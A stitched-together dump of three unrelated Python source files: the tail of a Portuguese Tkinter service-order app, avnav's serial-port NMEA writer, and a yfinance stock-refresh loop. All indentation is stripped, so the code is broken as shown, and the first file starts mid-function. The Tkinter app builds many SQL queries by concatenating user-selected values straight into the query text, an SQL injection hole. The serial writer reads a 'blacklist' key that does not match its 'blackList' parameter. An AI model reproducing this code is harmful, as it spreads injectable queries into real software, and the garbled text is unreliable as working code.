try:
self.cursor.execute("select ID, Operador, MotivoPause, CodigoPeca, Tipo, timediff(DataRetomada, DataPause), Produzido, Maquina, DataRetomada from pausas where OS ="+self.pegarOS)
pausas = self.cursor.fetchall()
if len(pausas) == 0:
self.lbl = Label(self.frameDadosTreeviewPause, text='0 operações pausadas', font=('arial', 10), bg='white')
self.lbl.place(relx=0.500, rely=0.500, anchor='center')
for i in range (len(pausas)):
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = pausas[i][0]
Operador = pausas[i][1]
MotivoPause = pausas[i][2]
Peca = pausas[i][3]
Tipo = pausas[i][4]
Tempo = pausas[i][5]
Produzido = pausas[i][6]
Maquina = pausas[i][7]
if str(pausas[i][8]) == 'None':
Tempo = 'Pausado'
self.viewPausas.insert("", "end", values=(ID, Operador, MotivoPause, Peca, Tipo, Tempo, Produzido, Maquina))
except Exception as erro: print(f'{erro}, {(erro.__class__)}')
def exibir_toplevel_pecas(self):
self.botAtribuirOper = Button(self.janelaDetalhesOS, text='Função Oper', font=('arial', 9), bg='#344f84', fg='white', border=2, command=self.atribuir_tarefa)
self.frameDadosTreeviewPecas = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
self.Add = PhotoImage(file="image/add.png")
self.botAddPeca = Button(self.frameDadosTreeviewPecas, image=self.Add, compound=RIGHT, text='Add ', font=('arial', 11), bg='white', fg='black', border=2, relief=FLAT, height=15)
self.chave = PhotoImage(file="image/chave.png")
self.lbll = Label(self.frameDadosTreeviewPecas, image=self.chave, compound=LEFT, text=' Peças utilizadas:', font=('arial', 12, 'bold'), bg='white')
self.lbll.place(relx=0.025, rely=0.013)
#Tree view onde exibirá as Ordem de Serviços Pausadas
self.viewPecas = ttk.Treeview(self.frameDadosTreeviewPecas, column=('1','2','3','4','5','6','7'), show='headings')
self.viewPecas.heading('1', text='ID', anchor='w')
self.viewPecas.heading('2', text='Descrição', anchor='w')
self.viewPecas.heading('3', text='Referência', anchor='w')
self.viewPecas.heading('4', text='QTDE', anchor='w')
self.viewPecas.heading('5', text='Material', anchor='w')
self.viewPecas.heading('6', text='Tratamento', anchor='w')
self.viewPecas.heading('7', text='Cod de Desenho', anchor='w')
self.viewPecas.column("1", width=0, anchor='w', minwidth=50)
self.viewPecas.column("2", width=0, anchor='w', minwidth=250)
self.viewPecas.column("3", width=0, anchor='w', minwidth=120)
self.viewPecas.column("4", width=0, anchor='w', minwidth=50)
self.viewPecas.column("5", width=0, anchor='w', minwidth=120)
self.viewPecas.column("6", width=0, anchor='w', minwidth=120)
self.viewPecas.column("7", width=0, anchor='w', minwidth=120)
self.viewPecas.place(relx=0.025, rely=0.115, relwidth=0.945, relheight=0.840)
self.viewPecas.bind("<Return>", self.exibir_info__pausa)
self.viewPecas.bind("<Double-1>", self.exibir_info__pausa)
self.viewPecas.bind("<Escape>", lambda event: self.remover_focus(event, self.viewPecas))
scrollbar3 = Scrollbar(self.frameDadosTreeviewPecas, orient="vertical", command=self.viewPecas.yview)
self.viewPecas.configure(yscrollcommand=scrollbar3.set)
scrollbar3.place(relx=0.975, rely=0.115, relwidth=0.025, relheight=0.835)
scrollbar4 = Scrollbar(self.frameDadosTreeviewPecas, orient="horizontal", command=self.viewPecas.xview)
self.viewPecas.configure(xscrollcommand=scrollbar4.set)
scrollbar4.place(relx=0.025, rely=0.950, relwidth=0.950, relheight=0.045)
self.frameInformacao = Frame(self.janelaDetalhesOS, highlightbackground='white', highlightcolor='white', highlightthickness=1, bg='white')
self.doc = PhotoImage(file="image/doc.png")
self.lblP = Label(self.frameInformacao, image=self.doc, compound=LEFT, text=' Info O.S.', font=('arial', 20, 'bold'), bg='white')
self.lblP.place(relx=0.999, rely=0.120, anchor='e')
self.lblP = Label(self.frameInformacao, text='Nº Peças:', font=('arial', 12, 'bold'), bg='white')
self.lblP.place(relx=0.999, rely=0.300, anchor='e')
self.lblP = Label(self.frameInformacao, font=('arial', 12), bg='white', border=2, relief=GROOVE, anchor='e')
self.lblP.place(relx=0.999, rely=0.370, anchor='e', relwidth=0.950)
try:
self.cursor.execute('select count(Produzido) from concluidas where OS = '+self.pegarOS)
self.lblP['text'] = self.cursor.fetchall()[0][0]
except Exception as erro: print(erro)
self.lblP = Label(self.frameInformacao, text='Nº Operações:', font=('arial', 12, 'bold'), bg='white')
self.lblP.place(relx=0.999, rely=0.460, anchor='e')
self.lblP = Label(self.frameInformacao, font=('arial', 12), bg='white', border=2, relief=GROOVE, anchor='e')
self.lblP.place(relx=0.999, rely=0.530, anchor='e', relwidth=0.950)
try:
self.cursor.execute('select count(id) from ordem_processo where OS = '+self.pegarOS)
self.lblP['text'] = self.cursor.fetchall()[0][0]
except Exception as erro: print(erro)
self.cc = PhotoImage(file="image/check.png")
self.lblP = Label(self.frameInformacao, image=self.cc, compound=LEFT, text=' Aberta', font=('arial', 20, 'bold'), bg='white')
self.lblP.place(relx=0.999, rely=0.910, anchor='e')
self.frameInformacao.place(relx=0.800, rely=0.200, relwidth=0.180, relheight=0.780)
try:
self.cursor.execute("select id from ordem_servico where OS = "+self.pegarOS)
idOS = self.cursor.fetchall()[0][0]
self.cursor.execute('select b.ID, b.Descricao, b.CodPeca, a.QTDE, b.Material, b.Tratamento, b.CodDesenho from ordem_pecas as a join pecas as b on a.idPeca = b.id join ordem_servico as c on a.idOS = c.id where a.idOS ='+str(idOS))
listPecas = self.cursor.fetchall()
for peca in listPecas:
self.viewPecas.insert("", "end", values=peca)
except Exception as erro: print(f'{erro}, {(erro.__class__)}')
def exibir_toplevel_sobre(self):
try:
self.cursor.execute('select count(distinct idOperador) from ordem_processo where OS = '+self.pegarOS)
operador = self.cursor.fetchall()[0][0]
self.cursor.execute('select count(Tipo) from concluidas where Tipo = "Nova OS" and OS = '+self.pegarOS)
totalConcluídas = self.cursor.fetchall()[0][0]
self.cursor.execute('select count(Tipo) from concluidas where Tipo = "Retrabalhar OS" and OS = '+self.pegarOS)
totalRetrabalho = self.cursor.fetchall()[0][0]
self.cursor.execute('select Produzido from concluidas where OS = '+self.pegarOS)
totalPecas = self.cursor.fetchall()
#Contando número de peças produzidas
soma = 0
for produto in totalPecas:
soma += produto[0]
totalPecas = soma
self.cursor.execute('select idOperacao from ordem_processo where OS = '+self.pegarOS)
totalOperacao = len(self.cursor.fetchall())
self.cursor.execute('select count(ID) from pausas where OS = '+self.pegarOS)
totalPausas = self.cursor.fetchall()[0][0]
SQL = ("select timediff(DataRetomada, DataPause) as result from pausas where OS = '"+self.pegarOS+"' and DataRetomada <> 'none' and MotivoPause <> 'Final de Expediente' and MotivoPause <> 'Horário de Almoço' ")
totalTempoPausado = self.somar_total_horas_gastas_os(SQL, 1)
SQL = ('select TempoProgramado from ordem_processo where OS = '+self.pegarOS)
totalTempoProgramado = self.somar_total_horas_gastas_os(SQL, 1)
SQL = ('select TempGastoExt from concluidas where OS = '+self.pegarOS)
totalTempoExtra = self.somar_total_horas_gastas_os(SQL, 1)
SQL = ('select TempGasto, TempGastoExt from concluidas where OS = '+self.pegarOS)
totalTempo = self.somar_total_horas_gastas_os(SQL, 2)
except Exception as erro:
print(f'ERROOOO {erro}, {(erro.__class__)}')
self.frameInfoRelatorio = Frame(self.janelaDetalhesOS, highlightbackground='black', highlightthickness=2, width=700)
self.frameLadoTop = Frame(self.frameInfoRelatorio, highlightbackground='black', highlightthickness=2, bg='white')
self.frameLadoTop.place(relx=0, rely=0, relwidth=1, relheight=0.130)
self.frameLadoEsquerdo = Frame(self.frameInfoRelatorio, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
self.frameLadoEsquerdo.place(relx=0, rely=0.130, relwidth=0.385, relheight=0.870)
self.frameLadoDireito = Frame(self.frameInfoRelatorio, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
self.frameLadoDireito.place(relx=0.385, rely=0.130, relwidth=0.615, relheight=0.870)
label= Label(self.frameLadoTop, text='Relatório de O.S', font=('arial', 15, 'bold'), fg='#344f84', bg='white')
label.place(relx=0.400, rely=0.200)
label= Label(self.frameLadoEsquerdo, text='Total de Operadores', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Concluídas', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Retrabalhos', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Peças Produzidas', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Operações', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Pausas Cometidas', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Horas Pausadas', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Horas Determinadas', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Horas Extras', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoEsquerdo, text='Total de Tempo', font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
#Label Respotas
label= Label(self.frameLadoDireito, text=operador, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalConcluídas, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalRetrabalho, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
if totalRetrabalho != 0:
label['fg'] = 'red'
label= Label(self.frameLadoDireito, text=totalPecas, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalOperacao, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalPausas, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalTempoPausado, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalTempoProgramado, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalTempoExtra, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
label= Label(self.frameLadoDireito, text=totalTempo, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
#Janelas que informa as datas das Operações e Pausas respectivas aos seus botões de opções
def exibir_info_da_operacao(self, event):
try:
#Pegando o Número de O.S que foi selecionada ao abrir janela
selecionada = self.viewOrdemServico.selection()[0]
pegarID = self.viewOrdemServico.item(selecionada, "values")
pegarID = pegarID[0]
except: return ''
self.exibir_info_tempo_horas('')
try:
self.cursor.execute("select b.Nome, b.CPF, a.DataAberta, a.DataIniciada, a.DataFinalizada from ordem_processo as a join funcionarios as b on b.id = a.idOperador where a.id ="+pegarID)
result = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
if messagebox.showerror(parent=self.janelaDetalhesOS, title='Verifique a conexão', message='Sem conexão com Banco de Dados'):
return 0
else:
nome = result[0][0]
cpf = str(result[0][1])
a = cpf[0:3]
b = cpf[3:6]
c = cpf[6:9]
d = cpf[9:]
cpf = a+'.'+b+'.'+c+'-'+d
if result[0][2] != None:
dataAberta = str(result[0][2])
dataAberta = dataAberta.split()[0]
horaAberta = str(result[0][2])
horaAberta = horaAberta.split()[1]
if result[0][3] != None:
dataInicial = str(result[0][3])
dataInicial = dataInicial.split()[0]
horaInicial = str(result[0][3])
horaInicial = horaInicial.split()[1]
else:
dataInicial = ' ** '
horaInicial = ' ** '
if result[0][4] != None:
dataFinal = str(result[0][4])
dataFinal = dataFinal.split()[0]
horaFinal = str(result[0][4])
horaFinal = horaFinal.split()[1]
else:
dataFinal = ' ** '
horaFinal = ' ** '
#Criando mini janela para exibir detalhes das operações
tela = Toplevel()
tela.title('Detalhes da operação')
tela['bg'] = 'white'
self.centraliza_tela(400, 400, tela)
def sair(event):
tela.destroy()
tela.bind('<Escape>', sair)
lbl = Label(tela, text='Nome:', font=('arial', 10), fg='black', bg='white')
lbl.place(relx=0.020, rely=0.020)
lbl = Label(tela, text=nome, font=('arial', 10), border=0, relief=GROOVE, bg='white')
lbl.place(relx=0.200, rely=0.025)
lbl = Label(tela, text='CPF:', font=('arial', 10), fg='black', bg='white')
lbl.place(relx=0.020, rely=0.080)
lbl = Label(tela, text=cpf, font=('arial', 10), border=0, relief=GROOVE, bg='white')
lbl.place(relx=0.200, rely=0.085)
canvas = Canvas(tela, bg='#e1e1e1')
canvas.place(relx=0.020, rely=0.160, relheight=0.005)
lbl = Label(tela, text='Aberta às '+horaAberta+' no dia '+dataAberta, font=('arial', 10), bg='white')
lbl.place(relx=0.50, rely=0.220, anchor='center')
lbl = Label(tela, text='Iniciada às '+horaInicial+' no dia '+dataInicial, font=('arial', 10), bg='white')
lbl.place(relx=0.50, rely=0.290, anchor='center')
lbl = Label(tela, text='Finalizada às '+horaFinal+' no dia '+dataFinal, font=('arial', 10), bg='white')
lbl.place(relx=0.50, rely=0.360, anchor='center')
canvas = Canvas(tela, bg='#e1e1e1')
canvas.place(relx=0.020, rely=0.420, relheight=0.005)
frame = LabelFrame(tela, text='Observação', bg='white', highlightbackground='#e1e1e1', highlightcolor='#e1e1e1')
frame.place(relx=0.050, rely=0.580, relwidth=0.900, relheight=0.300)
tela.transient(self.janelaDetalhesOS)
tela.focus_force()
tela.grab_set()
tela.mainloop()
def exibir_info__pausa(self, event):
try:
#Pegando o Número de O.S que foi selecionada ao abrir janela
selecionada = self.viewPausas.selection()[0]
pegarID = self.viewPausas.item(selecionada, "values")
pegarID = pegarID[0]
except: return ''
self.exibir_info_tempo_horas('')
tela = Toplevel()
#Chamando função para centralizar tela
self.centraliza_tela(400, 400, tela)
def sair(event):
tela.destroy()
tela.bind('<Escape>', sair)
try:
self.cursor.execute('select Operador, CPF, DataPause, DataRetomada from pausas where id = '+pegarID)
detalhes = self.cursor.fetchall()
nome = detalhes[0][0]
cpf = detalhes[0][1]
a = cpf[0:3]
b = cpf[3:6]
c = cpf[6:9]
d = cpf[9:]
cpf = a+'.'+b+'.'+c+'-'+d
horaPause = str(detalhes[0][2])
horaPause = horaPause.split()[1]
dataPause = str(detalhes[0][2])
dataPause = dataPause.split()[0]
horaRetomada = str(detalhes[0][3])
horaRetomada = horaRetomada.split()[1]
dataRetomada = str(detalhes[0][3])
dataRetomada = dataRetomada.split()[0]
except:
nome = ''
cpf = ''
horaRetomada = ''
dataRetomada = ''
lbl = Label(tela, text='Nome', font=('arial', 12, 'bold'), fg='#344f84')
lbl.place(relx=0.020, rely=0.020)
lbl = Label(tela, text=nome, font=('arial', 10), border=2, relief=GROOVE)
lbl.place(relx=0.200, rely=0.020, relwidth=0.700)
lbl = Label(tela, text='CPF', font=('arial', 12, 'bold'), fg='#344f84')
lbl.place(relx=0.020, rely=0.080)
lbl = Label(tela, text=cpf, font=('arial', 10), border=2, relief=GROOVE)
lbl.place(relx=0.200, rely=0.080, relwidth=0.400)
frame = LabelFrame(tela, text='Data', fg='#344f84')
frame.place(relx=0.050, rely=0.200, relwidth=0.900, relheight=0.170)
lbl = Label(frame, text='Hora Pause', font=('arial', 10, 'bold'), fg='#344f84')
lbl.place(relx=0.040, rely=0)
lbl = Label(frame, text=horaPause, font=('arial', 10), border=0, relief=GROOVE)
lbl.place(relx=0.310, rely=0.050, relwidth=0.170)
lbl = Label(frame, text='Data Pause', font=('arial', 10, 'bold'), fg='#344f84')
lbl.place(relx=0.510, rely=0)
lbl = Label(frame, text=dataPause, font=('arial', 10), border=0, relief=GROOVE)
lbl.place(relx=0.780, rely=0.050, relwidth=0.200)
lbl = Label(frame, text='Hora Retomada', font=('arial', 10, 'bold'), fg='#344f84')
lbl.place(relx=0.010, rely=0.450)
lbl = Label(frame, text=horaRetomada, font=('arial', 10), border=0, relief=GROOVE)
lbl.place(relx=0.310, rely=0.470, relwidth=0.170)
lbl = Label(frame, text='Data Retomada', font=('arial', 10, 'bold'), fg='#344f84')
lbl.place(relx=0.480, rely=0.450)
lbl = Label(frame, text=dataRetomada, font=('arial', 10), border=0, relief=GROOVE)
lbl.place(relx=0.780, rely=0.470, relwidth=0.200)
frame = LabelFrame(tela, text='Observação', fg='#344f84')
frame.place(relx=0.050, rely=0.380, relwidth=0.900, relheight=0.300)
tela.transient(self.janelaDetalhesOS)
tela.focus_force()
tela.grab_set()
tela.mainloop()
instancia = Application() |
serialwriter.py | # -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2021 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD licencse also (see ais.py) or omit ais.py
###############################################################################
import traceback
import time
from avnserial import *
import avnav_handlerList
from avnav_nmea import NMEAParser
from avnav_util import AVNLog
from avnav_worker import AVNWorker
hasSerial=False
try:
import serial
hasSerial=True
except:
pass
#a writer class to write to a serial port using pyserial
#on windows use an int for the port - e.g. use 4 for COM5
#on linux use the device name for the port
#this class is not directly a worker that can be instantiated from the config
#instead it is used by worker classes to handle serial output
#basically the configuration is the same like for the reader
#except that autobaud settings are ignored
class SerialWriter(SerialReader):
@classmethod
def getConfigParam(cls):
rt=list(filter(lambda x: x.name != 'minbaud' ,SerialReader.getConfigParam()))
ownParam=[
WorkerParameter('feederName','', type=WorkerParameter.T_STRING,editable=False),
WorkerParameter('combined', False, type=WorkerParameter.T_BOOLEAN,
description='if true, also start a reader'),
WorkerParameter('readFilter','', type=WorkerParameter.T_FILTER,
condition={'combined':True}),
WorkerParameter('blackList','',type=WorkerParameter.T_STRING,
description=', separated list of sources that we will not send out')
]
return rt+ownParam
#parameters:
#param - the config dict
#navdata - a nav data object (can be none if this reader does not directly write)
#a write data method used to write a received line
def __init__(self,param,writeData,infoHandler,sourceName):
for p in ('port','name','timeout'):
if param.get(p) is None:
raise Exception("missing "+p+" parameter for serial writer")
self.param=param
self.infoHandler=infoHandler
self.doStop=False
self.writeData=writeData
if self.writeData is None:
raise Exception("writeData has to be set")
feeder=AVNWorker.findFeeder(self.param.get('feederName'))
if feeder is None:
raise Exception("%s: cannot find a suitable feeder (name %s)",self.getName(),self.param.get('feederName') or "")
self.feeder=feeder
self.addrmap={}
#the serial device
self.device=None
self.buffer=None
self.sourceName=sourceName
self.blackList=[]
if param.get('blacklist') is not None:
self.blackList =param.get('blacklist').split(',')
self.blackList.append(sourceName)
self.combinedStatus={}
def stopHandler(self):
self.doStop=True
try:
self.device.close()
except:
pass
def openDevice(self,baud,autobaud,init=False):
self.buffer=''
f=None
try:
pnum=int(self.param['port'])
except:
pnum=self.param['port']
bytesize=int(self.param['bytesize'])
parity=self.param['parity']
stopbits=int(self.param['stopbits'])
xonxoff=self.P_XONOFF.fromDict(self.param)
rtscts=self.P_RTSCTS.fromDict(self.param)
portname=self.param['port']
timeout=float(self.param['timeout'])
name=self.getName()
isCombined = self.param.get('combined') or False
modeStr='writer' if not isCombined else 'combined'
if init:
AVNLog.info("openDevice for port %s, baudrate=%d, timeout=%f",
portname,baud,timeout)
init=False
else:
AVNLog.debug("openDevice for port %s, baudrate=%d, timeout=%f",portname,baud,timeout)
lastTime=time.time()
try:
self.setInfoWithKey("writer","%s opening %s at %d baud"%(modeStr,portname,baud),WorkerStatus.STARTED)
f=serial.Serial(pnum, timeout=timeout, baudrate=baud, bytesize=bytesize, parity=parity, stopbits=stopbits, xonxoff=xonxoff, rtscts=rtscts)
self.setInfoWithKey("writer","%s port %s open at %d baud"%(modeStr,portname,baud),WorkerStatus.STARTED)
return f
except Exception:
self.setInfoWithKey("writer","%s unable to open port %s"%(modeStr,portname),WorkerStatus.ERROR)
try:
tf=traceback.format_exc(3)
except:
tf="unable to decode exception"
AVNLog.debug("Exception on opening %s : %s",portname,tf)
if f is not None:
try:
f.close()
except:
pass
f=None
return f
def writeLine(self,serialDevice,data):
return serialDevice.write(data.encode('ascii','ignore'))
#the run method - just try forever
def run(self):
threading.current_thread().setName("%s - %s"%(self.getName(),self.param['port']))
self.device=None
init=True
isOpen=False
AVNLog.debug("started with param %s",",".join(str(i)+"="+str(self.param[i]) for i in list(self.param.keys())))
self.setInfoWithKey("writer","created",WorkerStatus.STARTED)
startReader=self.param.get('combined')
if startReader is not None and str(startReader).upper()=='TRUE':
AVNLog.debug("starting reader")
reader=threading.Thread(target=self.readMethod)
reader.setDaemon(True)
reader.start()
while not self.doStop:
name=self.getName()
timeout=float(self.param['timeout'])
portname=self.param['port']
porttimeout=timeout*10
baud=int(self.param['baud'])
maxerrors=int(self.param['numerrors'])
filterstr=self.param.get('filter')
filter=None
if filterstr != "":
filter=filterstr.split(',')
self.device=self.openDevice(baud,False,init=init)
init=False
if self.doStop:
AVNLog.info("handler stopped, leaving")
self.setInfoWithKey("writer","stopped",WorkerStatus.INACTIVE)
try:
self.device.close()
self.device=None
except:
pass
return
if self.device is None:
time.sleep(porttimeout/2)
continue
AVNLog.debug("%s opened, start sending data",self.device.name)
lastTime=time.time()
numerrors=0
seq=0
while True and not self.doStop:
bytes=0
try:
seq,data=self.feeder.fetchFromHistory(seq,10,includeSource=True,nmeafilter=filter)
if len(data)>0:
for line in data:
if line.source in self.blackList:
AVNLog.debug("ignore %s:%s due to blacklist",line.source,line.data)
else:
self.writeLine(self.device,line.data)
except Exception as e:
AVNLog.debug("Exception %s in serial write, close and reopen %s",traceback.format_exc(),portname)
try:
self.device.close()
self.device=None
isOpen=False
seq=0
except:
pass
break
AVNLog.info("stopping handler")
self.setInfoWithKey("writer","stopped",WorkerStatus.INACTIVE)
self.deleteInfo()
#the read method for the combined reader/writer
def readMethod(self):
threading.current_thread().setName("%s-combinedReader"%self.getName())
self.setInfoWithKey("reader","started",WorkerStatus.STARTED)
AVNLog.info("started")
filterstr=self.param.get('readFilter')
filter=None
if filterstr != "":
filter=filterstr.split(',')
hasNmea=False
source=self.sourceName
while not self.doStop:
try:
if self.device is not None:
bytes=self.device.readline(300)
if self.doStop:
AVNLog.info("Stopping reader of combined reader/writer %s",str(self.param['port']))
self.deleteInfoWithKey("reader")
return
if bytes is None or len(bytes)==0:
#if there is no data at all we simply take all the time we have...
AVNLog.debug("unable to read data, retrying ")
time.sleep(0.1)
continue
data=bytes.decode('ascii','ignore')
if len(data) < 5:
AVNLog.debug("ignore short data %s",data)
else:
if not NMEAParser.checkFilter(data,filter):
AVNLog.debug("ignore line %s due to not matching filter",data)
continue
if not hasNmea:
self.setInfoWithKey("reader","receiving data",WorkerStatus.NMEA)
if not self.writeData is None:
self.writeData(data,source)
else:
AVNLog.debug("unable to write data")
else:
time.sleep(0.5)
except:
AVNLog.debug("exception on read in mixed reader/writer %s (port %s)",traceback.format_exc(),str(self.param['port']))
time.sleep(0.5)
hasNmea=False
def _updateStatus(self):
finalStatus = WorkerStatus.INACTIVE
finalText = ''
hasItems=False
for k, v in self.combinedStatus.items():
hasItems=True
if v.status == WorkerStatus.ERROR:
finalStatus = WorkerStatus.ERROR
elif v.status == WorkerStatus.NMEA and finalStatus != WorkerStatus.ERROR:
finalStatus = WorkerStatus.NMEA
elif finalStatus == WorkerStatus.INACTIVE and v.status != WorkerStatus.INACTIVE:
finalStatus = v.status
finalText += "%s:[%s] %s " % (v.name, v.status, v.info)
if not self.infoHandler is None:
if hasItems:
self.infoHandler.setInfo('main', finalText, finalStatus)
else:
self.infoHandler.deleteInfo('main')
def setInfoWithKey(self,key,txt,status):
self.combinedStatus[key]=WorkerStatus(key,status,txt)
self._updateStatus()
def deleteInfoWithKey(self,key):
try:
del self.combinedStatus[key]
except:
pass
self._updateStatus()
#a Worker to directly write to a serial line using pyserial
#on windows use an int for the port - e.g. use 4 for COM5
#on linux use the device name for the port
#if no data is received within timeout *10 the port is closed and reopened
#this gives the chance to handle dynamically assigned ports with no issues
class AVNSerialWriter(AVNWorker):
@classmethod
def getConfigName(cls):
return "AVNSerialWriter"
@classmethod
def getConfigParam(cls, child=None):
if not child is None:
return None
cfg=SerialWriter.getConfigParam()
rt=cfg.copy()
return rt
@classmethod
def createInstance(cls, cfgparam):
if not hasSerial:
AVNLog.warn("serial writers configured but serial module not available, ignore them")
return None
rt=AVNSerialWriter(cfgparam)
return rt
@classmethod
def canEdit(cls):
return True
@classmethod
def canDeleteHandler(cls):
return True
@classmethod
def getEditableParameters(cls, makeCopy=True,id=None):
rt= super().getEditableParameters(True,id=id)
slist = SerialReader.listSerialPorts()
slist = UsedResource.filterListByUsed(UsedResource.T_SERIAL, slist,
cls.findUsersOf(UsedResource.T_SERIAL, ownId=id))
WorkerParameter.updateParamFor(rt, 'port', {'rangeOrList':slist})
return rt
def __init__(self,param):
for p in ('port','timeout'):
if param.get(p) is None:
raise Exception("missing "+p+" parameter for serial writer")
AVNWorker.__init__(self, param)
self.writer=None
def checkConfig(self, param):
if 'port' in param:
self.checkUsedResource(UsedResource.T_SERIAL,param.get('port'))
def stop(self):
try:
self.writer.stopHandler()
except:
pass
super().stop()
#thread run method - just try forever
def run(self):
while not self.shouldStop():
self.setNameIfEmpty("%s-%s"%(self.getName(),str(self.getParamValue('port'))))
self.freeAllUsedResources()
self.claimUsedResource(UsedResource.T_SERIAL,self.getParamValue('port'))
try:
self.writer=SerialWriter(self.param,self.writeData,self,self.getSourceName(self.getParamValue('port')))
self.writer.run()
except Exception as e:
AVNLog.error("exception in serial writer: %s",traceback.format_exc())
self.wait(2000)
AVNLog.info("restarting serial writer")
def updateConfig(self, param, child=None):
if 'port' in param:
self.checkUsedResource(UsedResource.T_SERIAL,param['port'])
super().updateConfig(param, child)
if self.writer is not None:
self.writer.stopHandler()
avnav_handlerList.registerHandler(AVNSerialWriter)
|
stockRefreshModule.py | import time
import yfinance as yf
import threading
from dotenv import load_dotenv
import src.app.domain.collections.stocks.stocksQueries as stockQueries
from random import randrange
from src.app.domain.collections.stocks.stocksDatabaseAccess import refreshRegularPriceForStock
from src.app.domain.collections.stocks.stocksDatabaseUtility import *
from src.app.database.utility import SqlUtility
from src.app.database.utility.StockUtility import *
def refreshAllStockAnalytics():
refreshThread = threading.Thread(target = startRefreshLoop)
refreshThread.start()
def startRefreshLoop():
while True:
print('Refreshing stock data from YF API')
load_dotenv()
selectAllTickersQueryString = stockQueries.getAllStockTickersAndSuffixes()
queryResponseTuples = SqlUtility.executeSelectRequest(selectAllTickersQueryString)
stockTickersString = ''
stockTickersList = []
for stockTuple in queryResponseTuples:
stockTicker, stockSuffix = stockTuple
stockTickerAggregate = concatenateTickerAndSuffix(stockTicker, stockSuffix)
stockTickersString += ' ' + stockTickerAggregate
stockTickersList += [stockTickerAggregate]
try:
yfStockResponse = yf.Tickers(stockTickersString)
except Exception:
print('YFinance API rejected Tickers request')
return
for tickerObject in yfStockResponse.tickers:
refreshStockByTickerAndSuffix(tickerObject)
for tickerObject in stockTickersList:
refreshPriceForStock(tickerObject)
print('Refresh successful')
time.sleep(180)
